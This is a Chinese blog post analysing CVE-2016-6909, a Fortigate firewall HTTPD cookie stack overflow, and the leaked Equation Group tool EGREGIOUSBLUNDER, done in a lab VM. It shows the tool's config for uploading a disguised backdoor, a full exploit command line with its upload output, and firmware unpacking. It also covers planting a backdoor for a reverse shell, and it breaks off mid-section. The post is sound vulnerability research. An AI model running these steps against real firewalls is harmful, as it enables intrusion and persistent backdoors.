<!DOCTYPE html>
<html  lang="zh">
<head>
    <meta charset="utf-8" />

<meta name="generator" content="Hexo 3.9.0" />

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />

<title>CVE-2016-6909——Fortigate防火墙HTTPD栈溢出漏洞 - Jon Tsang&#39;Blog</title>


    <meta name="description" content="TL;DR 对Fortigate固件和启动的流程的静态分析 在Fortigate防火墙中建立调试环境 Fortigate防火墙HTTPD栈溢出漏洞(CVE-2016-6909 )的分析 对Equation Group利用工具EGREGIOUSBLUNDER的分析">
<meta name="keywords" content="漏洞,Linux,Fortigate,防火墙,网络设备">
<meta property="og:type" content="article">
<meta property="og:title" content="CVE-2016-6909——Fortigate防火墙HTTPD栈溢出漏洞">
<meta property="og:url" content="https://jontsang.github.io/post/d4ec6e34.html">
<meta property="og:site_name" content="Jon Tsang&#39;Blog">
<meta property="og:description" content="TL;DR 对Fortigate固件和启动的流程的静态分析 在Fortigate防火墙中建立调试环境 Fortigate防火墙HTTPD栈溢出漏洞(CVE-2016-6909 )的分析 对Equation Group利用工具EGREGIOUSBLUNDER的分析">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190822230325.jpg">
<meta property="og:updated_time" content="2019-08-23T06:55:55.673Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="CVE-2016-6909——Fortigate防火墙HTTPD栈溢出漏洞">
<meta name="twitter:description" content="TL;DR 对Fortigate固件和启动的流程的静态分析 在Fortigate防火墙中建立调试环境 Fortigate防火墙HTTPD栈溢出漏洞(CVE-2016-6909 )的分析 对Equation Group利用工具EGREGIOUSBLUNDER的分析">
<meta name="twitter:image" content="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190822230325.jpg">







<link rel="icon" href="/images/favicon.svg">


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.7.2/css/bulma.css">
<link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.4.1/css/all.min.css">
<link rel="stylesheet" href="https://fonts.loli.net/css?family=Ubuntu:400,600|Source+Code+Pro">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css">


    
    
    
    <style>body>.footer,body>.navbar,body>.section{opacity:0}</style>
    

    
    
    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css">
    

    
    

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.css">


    
    
    
    

<link rel="stylesheet" href="/css/back-to-top.css">


    
    

    
    
    
    

    
    
<link rel="stylesheet" href="/css/progressbar.css">
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

    
    
    
        <script async="" src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    

    


<link rel="stylesheet" href="/css/style.css">
</head>
<!-- <body class="is-2-column"> -->
<body class="is-3-column">
    <nav class="navbar navbar-main">
    <div class="container">
        <div class="navbar-brand is-flex-center">
            <a class="navbar-item navbar-logo" href="/">
            
                <img src="/images/logo.svg" alt="CVE-2016-6909——Fortigate防火墙HTTPD栈溢出漏洞" height="28">
            
            </a>
        </div>
        <div class="navbar-menu">
            
            <div class="navbar-start">
                
                <a class="navbar-item"
                href="/">主页</a>
                
                <a class="navbar-item"
                href="/archives">归档</a>
                
                <a class="navbar-item"
                href="/categories">分类</a>
                
                <a class="navbar-item"
                href="/tags">标签</a>
                
                <a class="navbar-item"
                href="/about">关于</a>
                
            </div>
            
            <div class="navbar-end">
                
                    
                    
                    <a class="navbar-item" target="_blank" title="Download on GitHub" href="https://github.com/JonTsang">
                        
                        <i class="fab fa-github"></i>
                        
                    </a>
                    
                
                
                <a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;">
                    <i class="fas fa-list-ul"></i>
                </a>
                
                
                <a class="navbar-item search" title="搜索" href="javascript:;">
                    <i class="fas fa-search"></i>
                </a>
                
            </div>
        </div>
    </div>
</nav>
    
    <section class="section">
        <div class="container">
            <div class="columns">
                <div class="column is-8-tablet is-8-desktop is-9-widescreen has-order-2 column-main"><div class="card">
    
    <div class="card-image">
        <span  class="image is-7by1">
            <img class="thumbnail" src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190822230325.jpg" alt="CVE-2016-6909——Fortigate防火墙HTTPD栈溢出漏洞">
        </span>
    </div>
    
    <div class="card-content article ">
        
        <div class="level article-meta is-size-7 is-uppercase is-mobile is-overflow-x-auto">
            <div class="level-left">
                <time class="level-item has-text-grey" datetime="2017-11-12T09:46:12.000Z">2017-11-12</time>
                
                <div class="level-item">
                <a class="has-link-grey -link" href="/categories/漏洞分析/">漏洞分析</a>
                </div>
                
                
                <span class="level-item has-text-grey">
                    
                    
                    32 分钟 读完 (大约 4802 个字)
                </span>
                
                
                <span class="level-item has-text-grey" id="busuanzi_container_page_pv">
                    <i class="far fa-eye"></i>
                    <span id="busuanzi_value_page_pv">0</span>次访问
                </span>
                
            </div>
        </div>
        
        <h1 class="title is-size-3 is-size-4-mobile has-text-weight-normal">
            
                CVE-2016-6909——Fortigate防火墙HTTPD栈溢出漏洞
            
        </h1>
        <div class="content">
            <h2 id="TL-DR"><a href="#TL-DR" class="headerlink" title="TL;DR"></a>TL;DR</h2><ul>
<li>对Fortigate固件和启动的流程的静态分析</li>
<li>在Fortigate防火墙中建立调试环境</li>
<li>Fortigate防火墙HTTPD栈溢出漏洞(CVE-2016-6909 )的分析</li>
<li>对Equation Group利用工具EGREGIOUSBLUNDER的分析</li>
</ul>
<a id="more"></a>

<p>2016年，Shadow Brokers公开了黑客组织<strong>Equation Group</strong>针对各大厂商防火墙的<a href="https://musalbas.com/blog/2016/08/16/equation-group-firewall-operations-catalogue.html" target="_blank" rel="noopener">漏洞利用工具</a>遭到泄露。笔者找到了一个Fortigate防火墙的虚拟机版——<strong>FGT_VM-v400-build0482</strong>，正巧就在受漏洞影响的版本范围内，遂对利用工具中的<strong>EGREGIOUSBLUNDER</strong>进行了一番深入分析。相比起其他工具的奇葩名字，<strong>EGREGIOUSBLUNDER</strong> （令人震惊的错误）倒是十分贴切的。它利用了[CVE-2016-6909——Fortigate防火墙Web管理界面HTTP cookie的栈溢出漏洞，直接覆盖返回地址就可以控制程序指针，经典的栈溢出。按理说这种漏洞什么太高的技术含量，但是在防火墙上动态调试环境的搭建以及该工具中shellcode的编写都挺有意思的，所以觉得还是记录一下。</p>
<h2 id="环境搭建和工具介绍"><a href="#环境搭建和工具介绍" class="headerlink" title="环境搭建和工具介绍"></a>环境搭建和工具介绍</h2><h3 id="Fortigate防火墙配置"><a href="#Fortigate防火墙配置" class="headerlink" title="Fortigate防火墙配置"></a>Fortigate防火墙配置</h3><p>启动防火墙后，我们可以看到用于配置防火墙的CLI，这并不是底层系统的交互式shell，只能输入下面几个命令：</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">Fortigate-VM login: admin</span><br><span class="line">Password: #默认密码为空</span><br><span class="line">Welcome !</span><br><span class="line"></span><br><span class="line">Fortigate-VM #</span><br><span class="line">config      config object</span><br><span class="line">get         get dynamic and system information</span><br><span class="line">show        show configuration</span><br><span class="line">diagnose    diagnose facility</span><br><span class="line">execute     execute static commands</span><br><span class="line">exit        exit CLI</span><br></pre></td></tr></table></figure>

<h3 id="EGREGIOUSBLUNDER工具使用"><a href="#EGREGIOUSBLUNDER工具使用" class="headerlink" title="EGREGIOUSBLUNDER工具使用"></a>EGREGIOUSBLUNDER工具使用</h3><p>该工具需要指定很多参数，特比是需要指定一个特别的栈地址，而该地址在不同产品上都不相同吗，因此程序还附带了一个配置文件<code>EGBL.config</code>，里面记录了不同型号产品的相关参数。</p>
<p><code>EGBL.config</code>的开头有几项配置，可以更改上传的后门、上传后的文件名以及执行后的进程名。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"># path/name of local, static-built noserver to upload</span><br><span class="line">  NOSERV = /root/noserver</span><br><span class="line"># path/name of local noclient to run, should match version of server</span><br><span class="line">  NOCLI = /root/noclient</span><br><span class="line"># name of noserver file on target</span><br><span class="line">  NONAME = /bin/httpd</span><br><span class="line"># name of process on target</span><br><span class="line">  NOFAKE = /bin/httpsd</span><br></pre></td></tr></table></figure>

<p>还需要一个登录Web界面时设置的cookie的值，获取方式如下：</p>
<figure class="highlight shell hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">$</span> curl -X HEAD -v http://192.168.123.100/login 2&gt;&amp;1 | grep APSCOOKIE</span><br><span class="line">(standard input):15:&lt; Set-Cookie: APSCOOKIE_3943997904=0&amp;0; path=/; expires=Tue, 31-Dec-1968 16:48:05 GMT</span><br></pre></td></tr></table></figure>

<p>接着以如下方式执行，如果后面想抓包分析的话指定80端口同时关闭ssl（设置为0），但同时也需要更改防火墙默认配置（开始http支持，默认使用https）。</p>
<figure class="highlight shell hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">$</span> ./egregiousblunder -t 192.168.123.100 -p 443 -l 4444 --ssl 1 --nope --gen 4nc --cookienum 3943997904 --stack 0xbffff104</span><br><span class="line">loading nopen over HTTPS</span><br><span class="line">using stack addr 0xbffff104</span><br><span class="line">built authhash len 116</span><br><span class="line">built enc_authhash with len 116</span><br><span class="line">received good ACK1 message c0edbabe</span><br><span class="line">received stack addr 0xbffff104</span><br><span class="line">sent the file len/header, next is the file</span><br><span class="line">..................................</span><br><span class="line">done with sending (356996 bytes), waiting for file ack</span><br><span class="line">received good ACK2 message 356996, upload is cool</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823144612.png" alt="nopen shell"></p>
<blockquote>
<p><strong>Tip:</strong> 笔者找到的这个Fortigate VM版的溢出地址值并不在<code>EGBL.config</code>中，所以只能通过一个shell脚本将一个地址范围遍历了一遍才找到正确的地址值。</p>
</blockquote>
<h3 id="防火墙Web管理界面登录流程"><a href="#防火墙Web管理界面登录流程" class="headerlink" title="防火墙Web管理界面登录流程"></a>防火墙Web管理界面登录流程</h3><p>通过WEB方式登陆防火墙时，首先发送POST请求，请求包含登录名和密码。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823144520.png" alt="正常登录"></p>
<p>登录成功后，服务器响应一个<strong>APSCOOKIE</strong>作为身份验证令牌， 这个cookie值必须包含在任何后续请求中。<br><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823144533.png" alt="正常登录"></p>
<p>接下来看看egregiousblunder发送的数据包，通过发送一个包含精心构造的APSCOOKIE的HTTP请求，将shellcode布置在cookie中。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823144434.jpg" alt="攻击流量"></p>
<h2 id="文件系统和启动流程分析"><a href="#文件系统和启动流程分析" class="headerlink" title="文件系统和启动流程分析"></a>文件系统和启动流程分析</h2><p>一个设备固件的分析过程，通常包括了对固件文件的解密、文件系统还原、固件文件的修改及重构等。好在VM版的Fortigate并没有加密，我们只需想办法提取到文件系统，然后就是分析系统启动流程，包括内核、内核参数、初始化文件以及系统服务程序等就行。</p>
<h3 id="获取vmdk硬盘中的文件系统"><a href="#获取vmdk硬盘中的文件系统" class="headerlink" title="获取vmdk硬盘中的文件系统"></a>获取vmdk硬盘中的文件系统</h3><p>给Kali Linux添加一块现有硬盘，选择fortigate的vmdk硬盘。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823144803.png" alt="mount fortigate vmdk"></p>
<p>进入系统后，查看并挂载新添加的硬盘，可以看到硬盘分区中的文件。</p>
<figure class="highlight shell hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">$</span> mkdir fortios</span><br><span class="line"><span class="hljs-meta">$</span> fdisk -l</span><br><span class="line">Disk /dev/sda: 80 GiB, 85899345920 bytes, 167772160 sectors</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line">Device     Boot  Start     End Sectors  Size Id Type</span><br><span class="line">/dev/sdb1  *         1  262144  262144  128M 83 Linux</span><br><span class="line">/dev/sdb2       262145 4194304 3932160  1.9G 83 Linux</span><br><span class="line"><span class="hljs-meta">$</span> mount /dev/sdb1 fortios</span><br><span class="line"><span class="hljs-meta">$</span> cd fortios &amp;&amp; ll</span><br><span class="line">total 23M</span><br><span class="line">-rw-r--r-- 1 root root 5.0M Sep 21  2011 datafs.tar.gz</span><br><span class="line">-rw-r--r-- 1 root root  107 Sep 21  2011 extlinux.conf</span><br><span class="line">lrwxrwxrwx 1 root root   12 Sep 21  2011 flatkc -&gt; ./flatkc.smp</span><br><span class="line">-rw-r--r-- 1 root root  256 Sep 21  2011 flatkc.chk</span><br><span class="line">-rw-r--r-- 1 root root 1.4M Sep 21  2011 flatkc.nosmp</span><br><span class="line">-rw-r--r-- 1 root root 1.5M Sep 21  2011 flatkc.smp</span><br><span class="line">-r--r--r-- 1 root root  32K Sep 21  2011 ldlinux.sys</span><br><span class="line">drwx------ 2 root root  12K Sep 21  2011 lost+found</span><br><span class="line">-rw-r--r-- 1 root root  15M Sep 21  2011 rootfs.gz</span><br><span class="line">-rw-r--r-- 1 root root  256 Sep 21  2011 rootfs.gz.chk</span><br></pre></td></tr></table></figure>

<p>查看所有文件类型，最值得注意的是两个Linux内核（支持和不支持多处理器的内核），还有一个疑似<em>initial ramdisk</em>的文件<strong>rootfs.gz</strong>，说明这个防火墙是基于Linux的；还有一个SYSLINUX引导加载程序，我们可以查看它的配置文件<strong>extlinux.conf</strong>查看启动参数，进而确定<strong>rootfs.gz</strong>就是一个initial ramdisk。</p>
<figure class="highlight shell hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">$</span> file *</span><br><span class="line">datafs.tar.gz: gzip compressed data, last modified: Tue Sep 20 20:17:56 2011, from Unix, original size 8724480</span><br><span class="line">extlinux.conf: ASCII text</span><br><span class="line">flatkc:        symbolic link to ./flatkc.smp</span><br><span class="line">flatkc.chk:    data</span><br><span class="line">flatkc.nosmp:  Linux kernel x86 boot executable bzImage, version 2.4.25 (root@build170) #2 Tue Sep 20 12:46:19 PDT 2011, RO-rootFS, Normal VGA</span><br><span class="line">flatkc.smp:    Linux kernel x86 boot executable bzImage, version 2.4.25 (root@build170) #3 Tue Sep 20 12:49:39 PDT 2011, RO-rootFS, Normal VGA</span><br><span class="line">ldlinux.sys:   SYSLINUX loader (version 4.00)</span><br><span class="line">lost+found:    directory</span><br><span class="line">rootfs.gz:     gzip compressed data, last modified: Tue Sep 20 20:17:52 2011, from Unix, original size 19077120</span><br><span class="line">rootfs.gz.chk: data</span><br><span class="line"><span class="hljs-meta">$</span> cat extlinux.conf</span><br><span class="line">DEFAULT flatkc ro panic=5 endbase=0xA0000 console=tty0 root=/dev/ram0 ramdisk_size=65536 initrd=/rootfs.gz</span><br></pre></td></tr></table></figure>

<p>继续解压<strong>rootfs.gz</strong>后是符合FHS的目录结构，只是bin目录被打包压缩了。到这里，整个防火墙的文件系统已经呈现在我们面前了。</p>
<figure class="highlight shell hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">$</span> file rootfs</span><br><span class="line">rootfs: POSIX tar archive (GNU)</span><br><span class="line"><span class="hljs-meta">$</span> mkdir _rootfs &amp;&amp; mv rootfs _rootfs &amp;&amp; cd _rootfs</span><br><span class="line"><span class="hljs-meta">$</span> tar xf rootfs</span><br><span class="line"><span class="hljs-meta">$</span> ll</span><br><span class="line">total 31M</span><br><span class="line">-rw-r--r-- 1 root root 8.4M Sep 21  2011 bin.tar.xz</span><br><span class="line">drwxr-xr-x 2 root root 1.0K Sep 21  2011 data</span><br><span class="line">drwxr-xr-x 2 root root 1.0K Sep 21  2011 data2</span><br><span class="line">drwxr-xr-x 5 root root  13K Sep 21  2011 dev</span><br><span class="line">lrwxrwxrwx 1 root root    8 Sep 21  2011 etc -&gt; data/etc</span><br><span class="line">lrwxrwxrwx 1 root root    1 Sep 21  2011 fortidev -&gt; /</span><br><span class="line">drwxr-xr-x 2 root root 1.0K Sep 21  2011 lib</span><br><span class="line">-rw-r--r-- 1 root root 4.3M Sep 21  2011 migadmin.tar.xz</span><br><span class="line">drwxr-xr-x 2 root root 1.0K Sep 21  2011 proc</span><br><span class="line">-rw-r--r-- 1 root root  19M Sep 21  2011 rootfs</span><br><span class="line">drwxr-xr-x 2 root root 1.0K Sep 21  2011 sbin</span><br><span class="line">drwxr-xr-x 2 root root 1.0K Sep 21  2011 tmp</span><br><span class="line">drwxr-xr-x 8 root root 1.0K Sep 21  2011 var</span><br></pre></td></tr></table></figure>

<h3 id="初始化程序init分析"><a href="#初始化程序init分析" class="headerlink" title="初始化程序init分析"></a>初始化程序init分析</h3><p>显然，导致漏洞的程序十有八九就在<code>/bin</code>目录中，但尝试解压<strong>bin.tar.xz</strong>时，却发生了错误。按照System V的启动方式来看，首先内核首先启动的程序应该是<code>/sbin/init</code>，因此可以逆向该程序查看<strong>bin.tar.xz</strong>是如何被解压的。</p>
<p>首先是main函数，以下是经过整理的IDA反编译结果，init程序只做了三件事：</p>
<ol>
<li>解压bin.tar.xz和migadmin.tar.xz</li>
<li>解压完后删除bin.tar.xz和migadmin.tar.xz</li>
<li>启动/bin/init</li>
</ol>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">int</span> __<span class="hljs-function">cdecl <span class="hljs-title">main</span><span class="hljs-params">()</span></span></span><br><span class="line"><span class="hljs-function"></span>&#123;</span><br><span class="line">	<span class="hljs-keyword">char</span> *argv;</span><br><span class="line">    <span class="hljs-keyword">char</span> * <span class="hljs-keyword">const</span> envp[];</span><br><span class="line">    </span><br><span class="line">    <span class="hljs-keyword">if</span> ( decompress((<span class="hljs-keyword">int</span>)<span class="hljs-string">"bin"</span>) &gt;= <span class="hljs-number">0</span> )</span><br><span class="line">        decompress((<span class="hljs-keyword">int</span>)<span class="hljs-string">"migadmin"</span>);</span><br><span class="line">    unlink(<span class="hljs-string">"/sbin/xz"</span>);</span><br><span class="line">    unlink(<span class="hljs-string">"/sbin/ftar"</span>);</span><br><span class="line">    argv = <span class="hljs-string">"/bin/init"</span>;</span><br><span class="line">    envp = <span class="hljs-number">0</span>;</span><br><span class="line">    execve(<span class="hljs-string">"/bin/init"</span>, &amp;argv, &amp;envp);</span><br><span class="line">    </span><br><span class="line">    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>再看看<code>decompress()</code>函数内部，找到解压的参数。</p>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">signed</span> <span class="hljs-keyword">int</span> __<span class="hljs-function">cdecl <span class="hljs-title">decompress</span><span class="hljs-params">(<span class="hljs-keyword">int</span> a1)</span></span></span><br><span class="line"><span class="hljs-function"></span>&#123;</span><br><span class="line">	<span class="hljs-comment">//...</span></span><br><span class="line">    <span class="hljs-built_in">snprintf</span>(&amp;s, <span class="hljs-number">0x200</span>u, <span class="hljs-string">"/%s.tar.xz"</span>, a1);</span><br><span class="line">    <span class="hljs-comment">//...</span></span><br><span class="line">    argv = <span class="hljs-string">"/sbin/xz"</span>;</span><br><span class="line">    xz_option_str1 = <span class="hljs-string">"--check=sha256"</span>;</span><br><span class="line">    xz_option_str2 = <span class="hljs-string">"-d"</span>;</span><br><span class="line">    v19 = &amp;s;</span><br><span class="line">    v20 = <span class="hljs-number">0</span>;</span><br><span class="line">    execv(<span class="hljs-string">"/sbin/xz"</span>, &amp;argv);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="hljs-built_in">snprintf</span>(&amp;name, <span class="hljs-number">0x200</span>u, <span class="hljs-string">"/%s.tar"</span>, a1);</span><br><span class="line">	<span class="hljs-comment">//...</span></span><br><span class="line">LABEL_21:</span><br><span class="line">	<span class="hljs-comment">//...</span></span><br><span class="line">	var_438 = <span class="hljs-string">"/sbin/ftar"</span>;</span><br><span class="line">	ftar_option_str = <span class="hljs-string">"-xf"</span>;</span><br><span class="line">	v14 = &amp;name;</span><br><span class="line">	v15 = <span class="hljs-number">0</span>;</span><br><span class="line">	execv(<span class="hljs-string">"/sbin/ftar"</span>, &amp;var_438);</span><br><span class="line">	<span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>chroot</code>切换根目录到_rootfs目录解压两个文件</p>
<figure class="highlight shell hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">$</span> chroot . /sbin/xz -d bin.tar.xz</span><br><span class="line"><span class="hljs-meta">$</span> chroot . /sbin/ftar -xf bin.tar</span><br></pre></td></tr></table></figure>

<blockquote>
<p><strong>Tip:</strong> 其实进入sbin目录看到两个解压程序<code>xz</code>和<code>ftar</code>就能猜到怎么回事儿了，不过确认一下也好  </p>
</blockquote>
<h3 id="启动过程分析"><a href="#启动过程分析" class="headerlink" title="启动过程分析"></a>启动过程分析</h3><p>bin目录中的程序大部分都是指向<code>init</code>和<code>sysctl</code>的软链接，前者实现了防火墙的业务功能，后者类似busybox，提供一些Linux系统命令。</p>
<figure class="highlight shell hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">$</span> ll</span><br><span class="line">total 29M</span><br><span class="line">lrwxrwxrwx 1 root root    9 Dec 19 17:31 authd -&gt; /bin/init</span><br><span class="line">lrwxrwxrwx 1 root root   11 Dec 19 17:31 cat -&gt; /bin/sysctl</span><br><span class="line">lrwxrwxrwx 1 root root   11 Dec 19 17:31 chmod -&gt; /bin/sysctl</span><br><span class="line">lrwxrwxrwx 1 root root    9 Dec 19 17:31 cmdbsvr -&gt; /bin/init</span><br><span class="line">lrwxrwxrwx 1 root root   11 Dec 19 17:31 cp -&gt; /bin/sysctl</span><br><span class="line">lrwxrwxrwx 1 root root    9 Dec 19 17:31 dhcpd -&gt; /bin/init</span><br><span class="line">lrwxrwxrwx 1 root root    9 Dec 19 17:31 fgfmd -&gt; /bin/init</span><br><span class="line">lrwxrwxrwx 1 root root   11 Dec 19 17:31 grep -&gt; /bin/sysctl</span><br><span class="line">lrwxrwxrwx 1 root root    9 Dec 19 17:31 httpsd -&gt; /bin/init</span><br><span class="line">lrwxrwxrwx 1 root root   11 Dec 19 17:31 ifconfig -&gt; /bin/sysctl</span><br><span class="line">-rwxr-xr-x 1 root root  24M Sep 21  2011 init</span><br><span class="line">lrwxrwxrwx 1 root root    9 Dec 19 17:31 initXXXXXXXXXXXXXXXXXX -&gt; /bin/init</span><br><span class="line">lrwxrwxrwx 1 root root   11 Dec 19 17:31 mkdir -&gt; /bin/sysctl</span><br><span class="line">lrwxrwxrwx 1 root root    9 Dec 19 17:31 ospfd -&gt; /bin/init</span><br><span class="line">lrwxrwxrwx 1 root root   11 Dec 19 17:31 sh -&gt; /bin/sysctl</span><br><span class="line">lrwxrwxrwx 1 root root    9 Dec 19 17:31 ssh -&gt; /bin/init</span><br><span class="line">-rwxr-xr-x 1 root root 154K Sep 21  2011 sysctl</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<p>防火墙启动后，将<strong>initXXXXXXXXXXXXXXXXXX</strong>作为1号进程，接着fork出一系列的子进程实现业务功能。其中名为<strong>httpsd</strong>的守护进程，也就是Web服务器进程，根据前面的抓包分析，漏洞应该也和这个进程相关。第二个<strong>httpsd</strong>用于负责处理http请求，退出后由第一个httpsd负责重启。<br><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823144901.jpg" alt></p>
<h2 id="建立动态调试环境"><a href="#建立动态调试环境" class="headerlink" title="建立动态调试环境"></a>建立动态调试环境</h2><p>鉴于<strong>init</strong>的复杂程度（IDA分析出来有5W+的函数，且没有符号），单纯的依靠静态分析都很难定位到实现httpsd的位置，更不用提漏洞的位置了，而fortigate似乎不像Cisco ASA那样集成了gdbserver，所以我们得自己想办法搞定这个问题，总的来说有两个思路：</p>
<ol>
<li>将init取出来在本地调试运行；</li>
<li>将gdb移植到防火墙上。</li>
</ol>
<p>可能是由于init这个程序比较特殊，经过各种尝试都没法再本地将init运行起来，因此笔者只好使用了第二种方法，这其中也有很多坑。</p>
<h3 id="编译GDB"><a href="#编译GDB" class="headerlink" title="编译GDB"></a>编译GDB</h3><p>这部分挺简单的就不展开讲了，但是需要注意下面几点：</p>
<ol>
<li>GDB版本，本文分析的这个防火墙是基于Linux 2.4内核的，太新的GDB也许会有兼容性问题；</li>
<li>静态编译，以免缺失某些库。</li>
</ol>
<h3 id="将GDB放入防火墙文件系统"><a href="#将GDB放入防火墙文件系统" class="headerlink" title="将GDB放入防火墙文件系统"></a>将GDB放入防火墙文件系统</h3><p>准备好GDB后，将rootfs再打包回去时，还是要记得用3.2中的方法，使用防火墙自带的<code>ftar</code>工具将rootfs打包回去，否则防火墙无法正常启动。</p>
<h3 id="获取反向shell"><a href="#获取反向shell" class="headerlink" title="获取反向shell"></a>获取反向shell</h3><p>为了方便后期随时能接入防火墙进行调试，放置GDB的同时还可以放一个后门程序，用于得到一个shell，因为EGREGIOUSBLUNDER用的那个nopen工具是在不怎么好用。</p>
<blockquote>
<p><strong>Tip:</strong> 但这里存在一个问题——如何在防火墙启动以后，执行后门来得到shell。经过查询，笔者发现在 Fortigate 的配置命令行中，有一条隐藏命令——fnsysctl来执行前面提到过的sysctl，所以该怎么做大家应该都懂了。</p>
</blockquote>
